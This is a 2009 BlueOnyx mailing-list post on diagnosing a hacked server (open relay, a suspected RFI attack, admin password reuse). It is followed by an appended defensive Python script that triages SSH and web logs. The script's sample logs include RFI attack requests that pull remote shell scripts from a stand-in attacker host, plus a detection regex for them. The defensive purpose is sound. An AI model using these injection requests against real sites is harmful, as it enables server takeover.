[BlueOnyx:01824] Re: Second Server Hacked

Greg Kuhnert greg.kuhnert at theanchoragesylvania.com
Sun Jul 26 16:10:21 PET 2009

Steve Davis wrote:
> It was a new BX install, I had some mitigation installed, like dfix
> and denyhosts.
> No sites, I believe the need for default security that Michael and  
> Greg talked about in other posts is critical to BX success.
Steve's written to me briefly about this attack off-list before posting 
here. I thought I'd provide my response here.

The symptoms described are the same as his first server. It had become 
an open relay. In the case of his first server, there was evidence of 
tampering with sendmail config files. The sendmail config was rebuilt, and 
the open relay problem went away.

From memory, there was no evidence of non-admin user accounts being 
compromised. Without knowing his login patterns, it's hard to know if 
access to the admin account was all authorised access - but I didn't see 
any alarm bells relating to admin account compromise when I was looking 
on his server.

Some of the stuff I saw pointed to the cause being a RFI attack. Only a 
few weeks ago, I had found a similar problem with a larger customer - 
and I managed to keep copies of the malware that was installed. In 
Steve's case, I didn't do a full investigation to identify the specific 
vulnerability... but log files did indicate a fair bit of attack 
activity. I installed a prototype tool to mitigate all RFI attacks against 
the server.

My advice to Steve was that dfix and denyhosts (and my prototype tools) 
are basic tools that help protect against specific common problems, but 
I advised him to look at a security package from either Solarspeed or 
Compass to help provide a broader security solution.

I have not had a look at this 2nd server yet. Assuming the server has 
dfix and denyhosts, and no websites installed, the next question I 
would ask relates to the admin password on the new server. Is it unique? 
Is it the same as an admin password on other servers? Has anyone logged 
in from foreign IP addresses using the admin account?

Greg Kuhnert

|   / \   Greg Kuhnert, gkuhnert at compassnetworks.com.au               |
| <  o  > Compass Networks - Pointing you in the right direction      |
|   \ /   Come see us for BlueQuartz / BlueOnyx modules & Support.    |
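The two checks Greg suggests above, reviewing where the admin account has logged in from and looking for RFI activity in the web logs, as an added example that is not part of this thread and is not a BlueOnyx, dfix or denyhosts tool. It assumes OpenSSH-style sshd messages (the kind found in /var/log/secure on a CentOS-based BX box) and Apache common-log lines; the sample log lines, the operator network 203.0.113.0/24 and the hostnames in them are constructed for the example.

```python
"""Quick log triage for a suspected BlueOnyx compromise (added example, not project code).

Two questions from the thread, answered from logs:
  1. Has the admin account logged in from an address outside the operator's own networks?
  2. Do the web logs show remote file inclusion (RFI) attempts, i.e. a query-string
     parameter whose value is an http://, https:// or ftp:// URL?
"""
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote

# Networks from which admin logins are expected. Assumed for the example; replace with
# the real operator ranges before using this on a server.
ADMIN_ALLOWED_NETS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed sshd lines (OpenSSH syslog format). 198.51.100.23 is the pretend attacker.
SSHD_LOG = """\
Jul 25 03:12:44 bx sshd[2210]: Accepted password for admin from 203.0.113.7 port 51022 ssh2
Jul 25 04:40:02 bx sshd[2301]: Failed password for root from 198.51.100.23 port 40111 ssh2
Jul 25 04:40:05 bx sshd[2301]: Failed password for invalid user oracle from 198.51.100.23 port 40115 ssh2
Jul 25 04:41:19 bx sshd[2317]: Accepted password for admin from 198.51.100.23 port 40230 ssh2
Jul 25 09:00:01 bx sshd[2400]: Accepted publickey for admin from 203.0.113.9 port 50000 ssh2
"""

# Constructed Apache common-log lines. The second request URL-encodes the injected URL.
ACCESS_LOG = """\
198.51.100.23 - - [25/Jul/2009:04:10:11 +1000] "GET /index.php?page=http://attacker.example/r57.txt? HTTP/1.1" 404 220
198.51.100.23 - - [25/Jul/2009:04:10:12 +1000] "GET /cgi-bin/awstats.pl?configdir=http%3A%2F%2Fattacker.example%2Fcmd.txt%3F HTTP/1.1" 200 1024
203.0.113.7 - - [25/Jul/2009:04:11:00 +1000] "GET /images/logo.png HTTP/1.1" 200 5120
192.0.2.55 - - [25/Jul/2009:04:12:00 +1000] "GET /redirect.php?url=/local/page HTTP/1.1" 200 64
"""

SSH_ACCEPT = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port")
SSH_FAIL = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
# Common log format: client ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# A query parameter whose value starts with a remote URL scheme (checked after %-decoding).
RFI_PARAM = re.compile(r"[?&][^=&]*=(?:https?|ftp)://", re.IGNORECASE)


def foreign_admin_logins(log, admin="admin", allowed=ADMIN_ALLOWED_NETS):
    """Return (ip, auth method) for each successful login of `admin` from outside `allowed`."""
    hits = []
    for line in log.splitlines():
        m = SSH_ACCEPT.search(line)
        if not m or m.group("user") != admin:
            continue
        ip = ipaddress.ip_address(m.group("ip"))
        if not any(ip in net for net in allowed):
            hits.append((m.group("ip"), m.group("method")))
    return hits


def failed_logins_by_ip(log):
    """Count failed password attempts per source address (brute-force indicator)."""
    counts = Counter(m.group("ip") for m in map(SSH_FAIL.search, log.splitlines()) if m)
    return dict(counts)


def rfi_attempts(log):
    """Return requests whose query string carries a remote URL in a parameter value.

    A 200 on such a request does not prove the include succeeded, but it is the
    request worth pulling the script for; a 404 still shows the server is being probed.
    """
    hits = []
    for line in log.splitlines():
        m = CLF.search(line)
        if not m:
            continue
        target = unquote(m.group("target"))
        if RFI_PARAM.search(target):
            hits.append({"ip": m.group("ip"), "target": target, "status": int(m.group("status"))})
    return hits


def triage(sshd_log, access_log):
    """Bundle the three checks into one summary."""
    return {
        "foreign_admin_logins": foreign_admin_logins(sshd_log),
        "failed_logins_by_ip": failed_logins_by_ip(sshd_log),
        "rfi_attempts": rfi_attempts(access_log),
    }


if __name__ == "__main__":
    for key, value in triage(SSHD_LOG, ACCESS_LOG).items():
        print(key)
        for item in value.items() if isinstance(value, dict) else value:
            print("   ", item)
```

On real logs, feed the contents of the sshd log and each site's access log to the functions instead of the constructed strings; an admin login from an address that also appears in the failed-password counts, as in the sample, is the pattern that should prompt a password change on every server sharing that credential.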
